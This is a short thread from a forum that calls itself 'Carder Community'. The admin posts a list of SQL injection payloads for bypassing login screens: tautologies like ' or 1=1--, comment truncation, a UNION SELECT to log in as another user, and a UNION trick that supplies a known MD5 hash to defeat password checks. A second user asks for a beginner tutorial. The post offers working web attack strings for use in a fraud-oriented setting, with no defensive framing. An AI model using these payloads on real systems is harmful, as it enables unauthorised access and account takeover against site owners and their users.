Carder Community

    How to Bypass Login Screens By SQL Injection


    Posts : 116
    Join date : 2012-09-28

    How to Bypass Login Screens By SQL Injection

    Post  Admin on Mon Nov 12, 2012 5:30 am

    Bypassing Login Screens (SMO+) SQL Injection 101, Login tricks admin’ — admin’ # admin’/* ‘ or 1=1– ‘ or 1=1# ‘ or 1=1/* ‘) or ’1′=’1– ‘) or (’1′=’1– …. Login as different user (SM*) ‘ UNION SELECT 1, ‘anotheruser’, ‘doesnt matter’, 1– *Old versions of MySQL doesn’t support union queries Bypassing second MD5 hash check login screens If application is first getting the record by username and then compare returned MD5 with supplied password’s MD5 then you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database. Bypassing MD5 Hash Check Example (MSP) Username : admin Password : 1234 ‘ AND 1=0 UNION ALL SELECT ‘admin’, ’81dc9bdb52d04dc20036dbd8313ed055 81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)


    Posts : 2
    Join date : 2013-12-09

    bypass login screen

    Post  watson_79 on Mon Dec 09, 2013 8:17 am

    i am looking for a detailed tutorial for noobs on how to by pass login screens

      Current date/time is Thu Dec 13, 2018 7:17 am